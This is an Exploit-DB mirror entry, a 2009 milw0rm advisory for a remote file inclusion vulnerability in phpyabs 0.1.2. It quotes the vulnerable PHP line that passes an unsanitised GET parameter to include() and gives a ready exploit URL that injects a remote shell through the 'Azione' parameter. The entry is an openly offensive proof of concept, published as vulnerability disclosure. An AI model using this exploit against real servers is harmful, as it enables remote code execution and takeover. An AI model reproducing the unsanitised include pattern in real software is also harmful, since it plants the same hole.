exploit-db-mirror/platforms/php/webapps/8005.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

20 lines
692 B
Text
Executable file

********************************************************************************
phpyabs 0.1.2 RFI Vulnerability
********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
SITE: http://exploita.altervista.org
********************************************************************************
VULNERABLE CODE: (phpyabs/moduli/libri/index.php)
include($_GET['Azione'].".php");
********************************************************************************
RFI:
http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]
# milw0rm.com [2009-02-06]